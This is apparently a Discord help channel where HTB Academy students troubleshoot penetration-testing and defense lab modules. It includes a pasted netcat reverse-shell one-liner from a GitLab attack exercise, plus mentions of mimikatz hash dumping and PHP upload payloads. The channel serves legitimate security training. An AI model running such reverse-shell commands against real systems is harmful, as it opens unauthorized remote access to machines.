#modules

1 messages ยท Page 464 of 1

coarse pine
#

theeeennnnn

#

there is a discount

fathom pendant
#

there's also gonna be one for AI Red Teamer; WHEN that drops, who knows

fathom pendant
#

btw

#

it's the annual plans

coarse pine
#

when there is a new cer there is a discount for all vouchers?

fathom pendant
#

and typically the one relating to the cert

coarse pine
fathom pendant
#

i.e. silver annual if it's a cert that doesn't have tier 3 or higher modules
gold annual if it's a cert that has tier 3 or higher modules

coarse pine
#

then no discount for CWES

#

shit

#

can you convince my mom to pay for it

fathom pendant
#

the most important thing to take away is the knowledge, certs are just fancy pieces of paper that say you did a thing. But the knowledge is what should stick with you

coarse pine
#

are you rich

fathom pendant
#

dude

coarse pine
#

what

fathom pendant
#

get back to studying

coarse pine
#

okay momprayge

fathom pendant
#

don't

coarse pine
#

hmmm let me think

autumn pilot
#

please keep the channel on topic

fathom pendant
#

just quit while you're behind

coarse pine
#

then I will hack a website then get bounty to pay for it

fathom pendant
#

get back to the modules; study up

coarse pine
coarse pine
gray yacht
#

You can send me a DM if you are still stuck on this one.

remote yoke
#

Ohhh ok

west arrow
#

is there a way to share HTB Academy profile link same as ctf profile??

grizzled schooner
#

Attacking Common Applications | osTicket

I can't seem to get a working login. Tried both of the creds that were listed in the module - also googled around to find a dehashed.py script, but that doesn't work. Just a bit confused, is this box not working properly, or am I doing something wrong? Please @ with replies


just gonna have to reset the box until it works for me. Separate user reached out and told me it's something on my end

hasty turret
#

Any ideas on how to move Calc. Exe to the desktop? I am stuck on this finding evil module

sly grotto
#

i have the exact simillar issue
did you solve it?

#

did you solve it?
i have the same issue : (

rose lagoon
#

Hello I need help in the password attacks module please

#

for the Writing Custom Wordlists and Rules in Password Attacks I need help please

odd tendon
#

Hi, I am seeking clarification on the correct way to solve this question:

Module:
HTB CDSA Path -> Windows Attacks & Defense section -> Kerberoasting

After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?

What I have tried:
I searched through all the security logs, Server Roles custom views, and Applications and Services Logs, however I could not find any reference of an SID for the webservice user. I searched using EventID 4769 using the filter in the Security logs section, however I did not see any entries for the webservice user. I also tried checking EventID **4624 **for a possible login but I did not find any entries for the webserver user.

I looked in the chat's history to see if someone else had answered it but Im still confused

My workaround
I pulled the SID directly using Get-ADUser "webservice". But I feel as if I missed the entire point of the lesson doing it that way. Can anyone explain where I went wrong?

Thanks!

rose lagoon
#

Hello I need help in the password attacks module please
for the Writing Custom Wordlists and Rules in Password Attacks I need help please

rose lagoon
chilly furnace
#

Hey all I am having issues with the File Upload Attacks Whitelisting challenge question in CPTS.

I have successfully identified multiple extension the page will accept. I upload a file with a php cmd payload that shows โ€œfile uploaded successfullyโ€. When I navigate to the page I keep getting a 404 error. I have encountered this issue with multiple file extensions that were accepted, tried resetting the box, and still get the 404 error.

zinc zodiac
#

Im rn in the Windows Command Line module , i have a single exercise left but im not able to access the required machine from my vm , its giving out "ssh: connect to host 10.129.248.223 port 22: No route to host" as the error

#

has anyone faced this?

foggy jackal
hexed tartan
#

Itโ€™s our birthdayโ€ฆ but YOU get the gifts ๐ŸŽ
For a limited time, score 25% off HTB Academyโ€™s Gold & Silver Annual subscriptions. Access industry-shaped paths (including AI Red Teaming!), hands-on cybersecurity training, and get access to what's coming next (there might be a new certification coming your way ๐Ÿคซ).

โณ Offer ends 31 Dece...

feral patrol
#

Hi everyone, I'm stuck on this module - "Firewall and IDS/IPS Evasion - Hard Lab", would someone be willing to answer a couple questions i have please?

fathom pendant
feral patrol
fathom pendant
#

you're completely wrong

#

all academy modules use the same vpn connection, much like you can do all the active machines on labs from the same vpn config

#

also you didn't get a diff vpn for the easy lab either ๐Ÿ˜‰ they're all the same

feral patrol
#

ok, so i should be able to just open my pwnbox and solve it? im just doing it wrong then?

fathom pendant
#

the only different vpn entirely is the Exam vpn

#

pwnbox is the in-browser vm, that shouldn't be running at the same time you're using the vpn on your end.

feral patrol
#

ok. so that button that lets you download the vpn is only if you using your own vm? if your using pwnbox you dont need that? sorry if these are stupid questions im still fairly new

fathom pendant
#

correct

feral patrol
#

ok thank you

fathom pendant
feral patrol
#

ok awesome, i appreciate it

grizzled schooner
#

Working through Attacking GitLab

Anyone know what the issue here is?

โ””โ”€$ nc -nvlp 8888 listening on [any] 8888 ... connect to [10.10.15.130] from (UNKNOWN) [10.129.99.59] 50106 bash: cannot set terminal process group (1294): Inappropriate ioctl for device bash: no job control in this shell git@app04:~/gitlab-workhorse$ exit /bin/bash shell python3 -c 'import pty; pty.spawn("/bin/bash")'

Tried a couple of different methods that I could think of, but I know I have to be doing something wrong

fathom pendant
#

so something is up with your shell

grizzled schooner
#

I just copied from the module....

'rm /tmp/f;mkfifi /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <my IP> 8888 >/tmp/f '

fathom pendant
#

i'm just going off what I see where literally the first thing i see is exit

#

also it's mkfifo, not mkfifi

grizzled schooner
#

that would do it I think

#

that was it, thanks

quaint raft
#

Hey there how's it going?

#

Does anyone know how would you upload a file into an HTB vm?

#

i have to encode it in my actual PC and decode in in the VM , right?

quaint raft
#

yo , i just tried it , it worked, Thank you

quasi wave
#

hi for the one question of the Tapping into ETW section of Windows Event Logs and Finding Evil module, I am having trouble figuring out how to find the method. Is anyone available for DM?

#

I have been at it for an hour or so now maybe one and a half hours

#

I really want to solve this one

heady sapphire
#

I am on windows priv esc , outdated server section . When I try to xfreerdp I get error about ssl . How can I fix it ?

quasi wave
#

hi I am following the exact instructions for Tapping into ETW section of Windows Event Logs and Finding Evil module and it still won't work. Can someone hint me in the right direction?

#

this is for the only question of section

#

I know I asked earlier but is anyone able to DM?

civic inlet
#

is there a way to revert back to original htb UI like in the academy or no?

grizzled schooner
#

Attacking Common Applications | Attacking CGI Applications - ShellShock

I'm quite lost here. The module explains how to test for the vulnerability. What I don't understand is where to test for the vulnerability. They suggest this is to be done in some sort of terminal on the target website. But, when I hit the website, it's a default Apache site, and I can't appear to get anywhere else... Can I get a nudge or something? Please @ with replies

tulip copper
grizzled schooner
#

Oh alrght

tulip copper
#

You are attacking a cgi script

#

Not a web app

quasi wave
#

hi is anyone able to DM who has done CDSA?

tulip copper
#

So just follow the content/walk through and you should be allgood

quaint raft
#

Hey there , how's it going? struggling with "Working with IDS/IPS" module, i'm stuck at "Suricata Rule Development Part 2 (Encrypted Traffic)" section.

heady sapphire
dense lava
#

Maybe another client like rdesktop or remmina?

marsh echo
#

hello i'm stuck on this module ๐Ÿ˜ ๐Ÿ˜ญ https://academy.hackthebox.com/module/268/section/3064 i succeced reset passord on endpoint /api/v1/authentication/customers/passwords/resets/sms-otps but the user don't have role attribued itself. btw i succeced the challenge on the course with file upload but I don't know what else to do

quaint raft
marsh echo
boreal karma
#

Really weird how for the module privileged access, I was able to ingest data with bloodhound-python on linux but could not query CanPSRemote. Yet running Sharpview on Windows and using the GUI worked FINE. To troubleshoot, I even tried downloading the zip from windows and it still failed on linux Bloodhound CE.

#

After searching Discord, it seems like a lot of others have faced this problem too

flat fern
#

Hi, I am stuck on Attacking common application WordPress - Discovery & Enumeration question 3 - Find the version number of this plugin. (i.e., 4.5.2)
I read the readme.txt file and it gives me the version, but the it isn't working
I found the version near softwareVersion and near changelog

#

Found it
I was in the wrong page
NootLikeThis

quasi wave
#

hi guys I am still stuck on Windows Event Logs and Finding Evil - Tapping Into ETW question 1. I am following the exact instructions from the section but it isn't working

#

I did everything exactly as the section specified

feral adder
#

Hello currently doing the File Upload Modules under the white list filters, I am trying to bruteforce for whitelisted PHP extension in turbo but all response are Only images are allowed

digital inlet
#

Hey man, excuse me, I would like to ask how the problem of DNS Spoofing (Attack) in HTB Academy Wi-Fi Evil Twin Attacks is reproduced? I have tried many times and can't get the answer I want, can you give me some hints?

rustic sage
civic inlet
rustic sage
# civic inlet is it in your /etc/hosts file?
โ””โ”€โ”€โ•ผ [โ˜…]$ cat hosts
127.0.0.1    localhost
127.0.1.1    debian12-parrot

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-kual6aviq9 htb-kual6aviq9.htb-cloud.com
fathom pendant
misty owl
#

Hi there, just wanna check if anyone cleared SQLMAP Essentials -> Attack Tuning. For Case #5, is the flag different from what the answer is expected of? I got the flag from the db already but the website is rejecting it. There's no space at the suffix so i'm confuse why am I wrong ๐Ÿ’€

somber sonnet
#

hi guys, Im doing the Attacking Common Applications - Exploiting Web Vulnerabilities In Thick-Client Applications

#

I modified the User.java file to remove the hashing and stuff, and reassembled the jar file, but when I run it it no longer works

#

like the assembled jar file doesnt even open kek

sly grotto
# foggy jackal no..i didnt manage to.

so who is the owner of the module?
how can i ask him question here?
bertolis
@sick fulcrum
is that you?
i dont know how to solve android dynamic analysis- for the insecure library load through deep linking-, the app dont update to v2
and i cannot solve it with the provided solution, could you pleae help me?

marsh vessel
#

i have a problem in AD skill assessment 2
i have made a reverse shell with the sql and used mimikatz to dump the ntlm hashes using lsa_dump_sam from meterspreter but the hash i found of the admin didn't work and when opened a writeup it was a different one and the hash from the write up worked why is that is the ?

misty owl
gray yacht
minor sonnet
#

Module : Abusing HTTP Misconfigurations
Section : Web Cache Poisoning - Tools & Prevention
Question : Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application.
can you help me please , i have done everything and i have submitted multiple answers but none of them work

remote yoke
#

I am in the wordpress hacking module doing the skills assesment. Why am I not getting the actual request despite sending a POST req and the content-length being 403?

quaint raft
quaint raft
# quaint raft

Am i missing something here or there is something off here?

clever zenith
#

hello guys , have anyone encountered some problems form the revshell via splunk

#

i get to download the tarball with the powershell pointin to my attackin machine but it seems like its not executin when i download the package

quaint raft
clever zenith
#

did you got the rev shell on the atttackin splunk section ?

#

cuz i've done all the steps idk what am i missin

quaint raft
clever zenith
#

so basically i can't submit the flag

#

i may use some recent cves and see if they'll work

quaint raft
quaint raft
#

might be handy for my lab too and if you could tell me i'd appreciete it

clever zenith
#

yeah for sure i'll check if it works

#

and then i'll tell you

quaint raft
gentle sentinel
#

Hey everyone

#

system!

  • 5 Start the above target, copy the shown IP:PORT by clicking on them, and then paste them in your browser. What's the proof shown in the page?

Can someone help me with this please

brisk stump
#

I have a silver subscription already... if i get the 25OFFANNUALDEC25 deal, will it stack ontop.. so i get 12+ months when my current runs out ? *im not really sure where to ask tbh

storm elk
#

Please don't ping random people for a question

#

Also make sure you ask questions so that people can actually help you by reading this #modules message . I don't know what module/section you're on by reading your question

compact patrolBOT
grizzled schooner
clever zenith
# quaint raft Thanks

there're only authenticated cves can't find some anonymous ones , I can't figure it out

quaint raft
clever zenith
#

i don't know how did the others got that shell

#

i'll just keep doin the rest

gray yacht
clever zenith
#

yes it is

#

i've tried to disable and then re-enable

#

but still the same issue

gray yacht
#

Can you post the link to the section you are working on so I can verify we are talking about the same section?

clever zenith
gray yacht
mellow niche
#

Does anyone know how to overcome powershell breaking when following the module instructions?

quaint raft
grizzled schooner
feral patrol
#

I am seriously stuck on "Firewall and IDS/IPS Evasion - Hard Lab". Is there anyone who is willing to help me out

grizzled schooner
#

I mean installing an app in splunk should be the same

Top of the screen should show "Apps" (towards the top left) then go from there

quaint raft
grizzled schooner
#

What error?

quaint raft
#

It happens everytime

grizzled schooner
#

what are you trying to do in this app? I'm headed to lunch right now - if no one else can help / you don't get it I'll try when I come back

quaint raft
#

sysmon

quaint raft
raven spruce
#

Hey guys, anybody passed recently "Skills Assessment - Password Attacks". I mean recently? (nexura administrtor NTLM question) I heard that that assessment was changed recently.

I believe I checked everyhting that there is shared on FILE01 server that user hw.... has access to, and I see nothing of interest.

What's the next step? Bforcing other domain users (stom, bdavid) or what? Completely lost.

quaint raft
gray yacht
raven spruce
#

yes there are some old password psafe3 files, but no password for them.

gray yacht
raven spruce
#

That's what i mentioned initially. If pwd cracing is expected i believe it would be fair to hind which pwd list is the correct one (rockyou i suppose). I don't believe there is too much education in targetted cracking because it is utterly unreliable in real world.

But thank you for your suggestion r1ckyr3c0n!

gray yacht
sweet axle
#

Hi

#

Hey someone does know which lab is the "Skills Assessments" of the Attacking Enterprise Networks module?

#

I'm guessing is the last one(?

quasi wave
#

hi is anyone able to help me with the Tapping Into ETW section of Windows Event Logs and Finding Evil module?

#

like today? one on one?

quasi wave
#

solved

#

never mind

#

I solved it myself

grizzled schooner
#

Just want to express my distaste and dislike for the Thick Client Applications modules.. What a confusing module to go through...

tame wave
#

Every "valid" password I've found is marked wrong

tidal kelp
#

Hi guys - so currently on the Crackmapexec module > Kerberoastable sections > Trying to get accounts . no matter what i do from the pwnbox I get nothing back. I 've even copied the syntax from the 'show solution' and it gave me nothing back. Any ideas?

#

nvm, I'm stupid

upbeat hamlet
#

Hello all

#

Please help me in academy sql fundamental, last exercise skill injective : The last task cannot be injected, and the task site works without VPN and on the https protocol.. who can help with it?

#

Chattr

fathom pendant
#

@tame wave be careful with sharing screenshots that contain answers

fathom pendant
mental nova
#

Hey guys
By any chance does anyone know why answers of the wifi penetration testing tools and techniques are not available?

dawn sinew
#

In the "Pass the Ticket (PtT) from Linux" module from Linux. I was able to use Julio's ccache ticket from linux01 to log into his account on MS01 via proxychains and evil-winrm. I then used a powershell command to extract keys via Rubeus and Mimikatz, however, all of the tickets tied to his account were http service tickets - which (to my understanding) won't allow us to access C over Linux. Was anyone else able to export Julio's tickets from MS01 and then convert the .kirbi or base64 ticket into ccache and then upload to Linux to access C?

boreal karma
tame wave
gray yacht
fiery robin
#

Hey guys, In the log injection section of the HTTP Attacks module, does anyone know how to bypass the filter for < and >?

soft moon
quartz lagoon
#

i hope all insanes don't look like this lol

civic inlet
#

hello everyone sorry what Im about to say is not related to modules but I cant remember wasnt there like a /feedback or something sorry!

cloud urchin
#

Yeah /feedback

crimson moon
#

can i DM anyone about the Broken authentication skills assessment please?

crimson moon
civic inlet
weary torrent
#

Hi friends, currently at skills assessment of Password Attacks module. Ssh'd into jbetty user in dmz but when I run proxychains, it reads command not found and when I try to install with sudo it throws an error " "jbetty is not in the sudoers file". Proxychains.conf file doesn't exist either. Anyone having an idea what I am missing ?

weary torrent
#

I'm gonna restart the lab, see if that fixes the problem

earnest pasture
weary torrent
#

I don't know about dynamic port forwarding ssh tho, I'll look it up. Thank you

#

if you meant ssh -d , If I recall correctly that also timed out I believe bc there was no route to other hosts than DC01

#

in /etc/hosts file and since I was not in the sudo list, I couldn't edit it either

earnest pasture
weary torrent
#

just did

weary torrent
digital pendant
vale geyser
#

I noticed on the "Windows Privilege Escalation" module that users (which are no administrators) can get their privileges through UAC...I just didnt quite understand how this works.

Basically the htb-student user has the standard low privilege rights. I checked groups etc. andere is no admin group from what i can see. When i prompt the cmd.exe with "Run As Administrator" then i get the Privilege assigned (SeTakeOwnershipPrivilege). I authenticate against UAC with the htb-student user. In the "administrative cmd" the user also doesnt have any administrative groups.

Can someone explain why this happens and/or works?

dense lava
#

so you arent an administrator, and UAC doesnt give you admin privs, UAC just gives you that privilege

#

you can then use that to take ownership of files you need to elevate or have creds in them

mellow niche
grizzled schooner
#

Just to get monta to work I had to run a couple different things as admin - but gave up after that @mellow niche

coarse pine
#

call me a good boy

worldly falcon
#

I'm in the same boat. The default message is not specified and is "classified as ham" 100% or anything over 90% or some other threshold? I have manipulated all of the messages listed on the page in my local instance to come back as ham, but they all fail to pass the question. Same thing with manipulating the model, I can get it to classify as required by the question yet again no pass. If you don't know what the question is or the format required or the way the answer is evaluated to answer it defeats the purpose. I had the same issue on the Immersive Labs platform, so they reworded a number of their questions. If the response format is well defined, then it is simple to answer the question. When formatting is unknown or there is ambiguity is in the question, the module becomes tiresome and the platform becomes far less valuable as this module has now become a waste of my time as I do not know how to answer the question.

mental canopy
exotic dagger
#

I am beyond lost with the introduction to nosql injection skills assessment part 2. Anyone have any pointers. The entire module was not bad then just completely wrecked!

vale geyser
sonic forge
#

guys i got a flag but it keeps teling me i put it wrong

#

i did copy paste

#

and try all the ways to put it

#

what part of it shold i copy and paste ,like i try to put all of them but it just wont work

worldly falcon
#

Red Teaming AI - Manipulating the Model
The default message is not specified and is the question content "classified as ham" 100% or anything over 90% or some other threshold? I have manipulated all of the messages listed on the page in my local instance to come back as ham, but they all fail to pass the question. Same thing with manipulating the model, I can get it to classify as required by the question yet again no pass. If you don't know what the question is or the format required or the way the answer is evaluated to answer it defeats the purpose.

#

This appears to be a common problem with this module. The questions can't ba answered because no one knows what they expect the format for the answer to be

grizzled schooner
#

Having super weird VPN issues... VPN keeps connecting, then reconnecting and it's an endless loop... downloaded a new file, same thing... Any ideas on how to fix? Please @ with replies

silk panther
#

@grizzled schooner
I'm having trouble as well, I did not further investigate though.
But my VPN is not having a great time today..

grizzled schooner
#

That's not what I'm getting!

#

and it just keeps looping

#

Can't even do this module, because the VPN keeps buffering (?)

flint kraken
#

I do have trouble too

grizzled schooner
#

US or EU?

flint kraken
#

EU

grizzled schooner
#

Are you seeing the same thing happening as I am?

flint kraken
#

I actually don't because I use the vpn a different way and i can't see the logs but I can't ping the machine I start on the lab after 2 minutes so I restart it over and over again

grizzled schooner
#

Willing to be it's the same thing happening...

flint kraken
#

yeah I'm just gonna stop and continue tomorrow

obsidian fractal
#

I'm working on NFS in the fingerprinting module and I found the nfs shares on the target but no matter how I try to mount the shares i get "mount.nfs: access denied by server while mounting 10.129.223.91:/var/nfs" I've tried setting verision, nolock, connection types but I can't seem to get anywhere. Does anyone have any guidance?

grizzled schooner
#

It's been a super long time since I've done that, but have you tried with sudo? Sounds dumb but does work

obsidian fractal
grizzled schooner
#

Hmm... I'm not too sure, sorry!

fathom pendant
obsidian fractal
grizzled schooner
civic inlet
fathom pendant
#

but there's something going on where openvpn didn't terminate another connection you had running, which is why you have tun1 there instead of tun0 (unless you have another vpn tunnel running for another service)

obsidian fractal
civic inlet
#

when you ran showmount -e did you see NFS shares?

obsidian fractal
#

yeah, there were two shares, /var/nfs and /mnt/nfashare/

So I had sudo mount -t nfs 10.129.180.251:/var.nfs ~/Documents/t/ -o vers=3,nolock

fathom pendant
#

Why are you specifying version?

obsidian fractal
#

I was messing around trying different options. vers 3 is the only one that exists according to the nmap scan, so I tried specifying version to see if it would help

civic inlet
fathom pendant
#

Enterprise links wont work as theres a key part linked to your organization as part of it

grand veldt
#

can somebody help me . when i am coonecting to vpn than it takes to long and failed to connect

autumn pilot
grand veldt
#

thank you very much bro

mystic fjord
#

When i get the flag? (Introduction to Windows Evasion Techniques module)

cloud urchin
#

You have to follow the instructions precisely

mystic fjord
#

shit, i was using a custom loader

#

thanks then

dusk holly
#

FootPrinting-> IMAP/POP3
Trying to solve the labs, i am having trouble connecting to the target using creds || robin:robin || it is giving me error (from ncat)
"Plaintext authentication disallowed on non-secure (SSL/TLS) connections."
but using openssl to connect to the target won't give me any response backs, anyone faced the same issue?
i am using this command to connect
openssl s_client -connect 10.129.232.190:imaps

autumn pilot
#

Are you using tags within the queries/commands?

dusk holly
#

but the error is not about it isn't it

pastel niche
#

Hi,
Iโ€™m currently doing Attacking FTP from Attacking Common Services. But the box seems to not show service on port 2121 runningโ€ฆ is anyone experiencing the same issue ?

crimson moon
#

Attacking GraphQL: After executing an introspection query, what is the flag you can exfiltrate? I don't seem to see a flag after the query. Can someone pls give me a hint of sort?

floral crag
#

Hi,
Iโ€™m currently doing Windows Attacks & Defense Kerberos Constrained Delegation part on the soc module and i can run this as it says in the attack

waxen totem
#

you don't just run it, you import it.

#

also don't forget to set the execution policy to bypass

proper parrot
quartz sundial
upper widget
proper parrot
#

F

dusk holly
#

me too

upper widget
solar leaf
#

What happened to HTB ?

upper widget
#

Most applications are not working. I think it's again the cloudflare

steep skiff
#

turns out not only me having this problem

steep skiff
#

but i redid the nmap and somehow it shows on the second try

solar leaf
#

Yeah The problrm is for all

quartz sundial
glad flicker
#

it's cloudflare

#

again

#

not just HTB

quartz sundial
#

Friday in Cloudflare)

dusk holly
#

fixed now

steep skiff
#

yup fixed now

quartz sundial
#

yeeeeah boy

floral crag
floral crag
cyan arch
#

Why are the AD modules so wierd? I'm doing the enum & attacks on AD module, literally can't RDP tried soo many different things, finally just moved with working on winrm. This is what I faced on the "misc misconfigurations" and the attacking domain trusts as well

#

:/

floral crag
#

i need help on Windows Attack and Defense Print Spooler
Having trouble with submitting the answer to the last question. I completed the attack, connected to DC1, changed the registry to prevent the attack and restarted DC1 and attempted the attack again. The question says to submit the error message as the answer when running dementor.py from the kali machine it lets us spawn. I copied and pasted the error message but it tells me the answer is wrong. Any help would be much appreciated.

Error message that i received.
[-] exception RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.

pastel niche
fresh moth
#

in Skills Assessment - Password Attacks im in the JuMp server and i got an admin password from the tmp folder.. is that a rabbit hole? should i even reach dc or can i dump lssass then provide the hash?

cyan arch
proper parrot
#

Teaches what to do on windows but you can't do it personally because there's no creds.

autumn pilot
#

please be mindful while trying to ask for clarification in a section in terms of not taking a screenshot of the contents of the whole section

acoustic mountain
#

Good morning everyone. I've just finished with the Web Enumeration section of Getting Started. I'm going back through the steps to try and use curl as much as I can to get more familiar with it and I'm getting hung up on using the credentials to get through the login portal tried using curl -u <username>:<password> http://<IP Address>:<Port>/. Any tips? Thank you!

coarse pine
exotic dagger
#

If you are stuck on the HTTP response splitting you can DM me. Just know you have everything you need to inspect what is happening and perfect your payload.

random vortex
#

is there any machines that looks at any idps?

pale island
#

does the last sentence sound logical?? feel like its a #1234357888114364508 , but dont feel like i have to make a post if its just me misunderstanding

opal nexus
#

Does anyone else encountering this problem?

gray yacht
opal nexus
compact patrolBOT
fathom pendant
#

^ then reach out to support

winter glade
#

I am on the broken authentication module. The first brute-forcing passwords question: what is the password for โ€˜adminโ€™

The example uses rockyou.txt
In the workstation: thereโ€™s 20+ rockyou.txt.
Does anyone know which rockyou.txt file I should use to ffuf the password with?

fathom pendant
#

they're generally all gonna be the same, though the example should give you the wordlist location if i'm not mistaken. otherwise just pick one and go

winter glade
#

Will try the -70โ€ฆ wish me luck!

fathom pendant
#

ah yeah they are broken into sections in some places

#

there should be a full list on the machine

coarse pine
steep skiff
#

im confuse as well on that part haha

rustic sage
#

I had trouble with this the script would lock up I just ended up trying a bunch of pins the output made

flint kraken
#

hello, yall do have some target problem ? like i can't ping them after 5 minutes I have to launch the target again. I tried changing vpn

ripe bobcat
#

hi

#

ineed help on moduel

dark hedge
ripe bobcat
ripe bobcat
#

After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag

#

guys here when i do sudo -l

#

ALL : ALL) NOPASSWD: /usr/bin/php

#

so ineed to make php file that can read root.txt file ?

hidden ledge
#

You have sudo right on this binary so look under SUDO section on gtfobins

#

You can leverage to root instantly

ripe bobcat
zenith dove
#

New to HTB, doing the File Transfer module. Is there an easy/quick way to get the upload_win.zip onto my Pwnbox, or is getting that onto my Pwnbox to get to the target machine just part of the challenge?

weary torrent
zenith dove
weary torrent
#

have you tried browsing to academy on the attack box

zenith dove
weary torrent
zenith dove
silk lagoon
#

You figured it out?

weary torrent
silk lagoon
#

Cool

gaunt ibex
#

Look at the last section before skills assessment.

teal root
#

Not sure if this is related, but I was getting the hash from mimikatz through SSH and it was failing the auth, until I used RDP and the same mimikatz returned a completely different RC4 hash that worked for the logistics$ account

fathom pendant
#

@iron yarrow the module is above tier 0; please refrain from sharing spoilers for skill assessments. as a reminder, the module tells you about several different methods for bypassing some restrictions

hidden ledge
round surge
#

Has there been an issue with spawning targets???

cyan arch
#

Idk but I am facing another issue, I can spawn the machine. But can't query the cross forest at all ...... ?? Im stuck at the cross forest attacks from windows part because I just can't get any kind of users from the other forest?? Could someone help me with this please

#

I see the error "a referral was returned from the server"

sweet sedge
reef summit
#

Anyone knocked out the module "Introduction to Linux Forensics" Stuck on the meterpreter uuid question..

hallow barn
exotic dagger
#

What part of a TE.TE smuggled request will prevent the second request from being cut off? Or what should I study to figure out the answer to my question?

fathom pendant
exotic dagger
fathom pendant
#

it's just obfuscating the header

exotic dagger
uncut hull
#

hiiiii

#

i hope everyone doing good

steep skiff
#

hello guys, just wanted to ask whether you guys have a connection problem to the academy these past few days or not

uncut hull
#

no man its working all fine

broken ridge
#

workin for me too

uncut hull
#

i mean reset your connection

#

ig then itll work

steep skiff
#

aight aight

tall dock
#

Can you help me with this question? Iโ€™m honestly close to losing my mind.
I have 13 Azure users and 3 that have a path to Global Administrator, but that still doesnโ€™t seem to be the correct answer.
What am I missing?

gilded gale
#

In the Footprinting module, the DNS part, couldnt find the subdomain with IP ending with octet 203, after turning on step by step solution i found that the subdomain is in the namelist wordlist, the question is in real pentest how to know which wordlist to choose? Is there any thought process which leads to the right wordlist?

steep skiff
flint kraken
#

yes, can't even ping the machine i have to reset

#

I'm on the footprinting module and I keep getting problems after less than 5 minutes...

steep skiff
#

yea im at attacking common services

iron yarrow
#

Skills Assessment - File Inclusion

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

I need help

iron yarrow
# hidden ledge Where are you stuck?

I managed to send the file, I sent PHP, PDF, and JPG.

I found a parameter but I can't explore it because it says it contains invalid characters.

fresh moth
#

hey can ayone tell me if we need to reach DC to submit the has or can we just grab the admin has from other accounts ? for saw jump 1 (Skills Assessment - Password Attacks )

hidden ledge
iron yarrow
#

Yes, it has an href <img

#

@hidden ledge

cyan veldt
#

Hello, in the web fuzzing module validating findings section, it tells me that I can just read the header and read the contect length to see if the page exists or not. I was wondering if thats what am I suppose to do in the real world and I cant really read the sensitive web pages

hidden ledge
#

With what you were taught during the module

iron yarrow
hidden ledge
#

That's all the point of the File Inclusion module :))

steep skiff
#

yooo im at skill assessment - ease attacking common services, im having a trouble as i dont see an entry point. I suppose that i can enumerate users from smtp, but turns out it doesnt give anything as well. Read the writeup and t suppose to give me something. Do you guys have this problem as well but the first entry point is ot the smtp?

fathom pendant
#

try to adjust your wait times

steep skiff
#

damn that affect things?

#

yeah, no luck as well

#

set the wait time to 10

fathom pendant
minor belfry
#

guys i'm in Password Attacks module - pass the Certificate and i'm stuck with winRM error

spark portal
#

what does the error say?

#

Cannot find KDC for realm "INLANEFREIGHT.LOCAL"
is your krb5.conf properly set?

minor belfry
#

no

#

what to write in ?

#

and where to find it

spark portal
#

hmm... run nxc smb <target_ip> -u 'whatever' -p '' --generate-krb5-file file && sudo mv file /etc/krb5.conf

#

sorry, make sure to add the target ip too

minor belfry
#

i found this one

#

it's pwnbox

#

where to edit and what to write ?

spark portal
#

alter the one at /etc/krb5.conf

#

run the command i sent

#

will create your file, move it there

minor belfry
#
[โ˜…]$ nxc smb 10.129.231.223 -u 'wwhite' -p 'package5shores_topher1' --generate-krb5-file file && sudo mv file /etc/krb5.conf
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file
usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
           [--verbose] [--debug] [--no-progress] [--log LOG] [-6]
           [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT]
           [--version]
           {mssql,winrm,ldap,smb,ssh,vnc,wmi,ftp,rdp} ...
nxc: error: unrecognized arguments: --generate-krb5-file file
spark portal
#

pwn box nxc is outdated, do it manually, edit /etc/krb5.conf @minor belfry

#

or you can upgrade your nxc version and rerun the command

minor belfry
#

can you give the prober thing

#

i have done it before and it didn't work

#

what to write in krb5.conf what i mean

spark portal
minor belfry
#

yea in /usr/share/samba/setup/krb5.conf

minor belfry
spark portal
#

please fill in IP with targets ip**

spark portal
# minor belfry that one

save this script for later when you need to redo this, and make it a habit to update your nxc, pwnbox's is quite old

minor belfry
#

yea ik but my internet is sucks so i have to use pwnbox for now

fathom pendant
#

module is above tier 0, please refrain from spoilers :)

turbid hull
#

Hello, i am stuck at injection fundamentals module, section skill assessment, can i dm someone for a nudge on initial access. I think i must do a sql injection to register myself but nothing seems to work.

boreal karma
#

Is it ok to just follow the walkthrough for AEN to save time and start the test.

#

lol

#

instead of blind*

fathom pendant
#

that's up to you; the reason it's recommended blind is to test your methodology. It's not about the time it takes

agile flicker
#

is the module section only available for vip people?

fathom pendant
#

no

#

academy has 0 to do with VIP

agile flicker
#

where do i find it?

fathom pendant
agile flicker
#

nvm found it on the top right

#

sheesh those modules are expensive haha wallet is gonna dry out ๐Ÿ˜„

fathom pendant
#

that's why the plans are the better value overall ๐Ÿ˜‰

#

that's what the % discount means on the monthly plans you save x% compared to buying the same amount of cubes directly

agile flicker
#

will take a look into it, pretty interesting ๐Ÿ™‚ thanks

coarse pine
#

I hope if HTB has a module about PHP

charred umbra
#

Hi, Iโ€™m stuck on an exercise in Introduction to Bash Scripting section comparison operators, and I donโ€™t know what I should do in this situation

heady sapphire
#

Document and reporting practise lab. I canโ€™t find the admin credentials to log in to the report writing web app on port 443 as mentioned in the course . The admin credentials are not provided . Please help !

coarse pine
thin flicker
#

Hello everyone. I just finished a lesson on organization in the setting up module of the Information Security path. I was abit confused with the notes on Logging at the latter part of the lesson. I'm I to make those changes in the VM instance. Also do I need to download some of the tools recommend seeing how I'm just starting the lessons as a beginner.

olive jackal
#

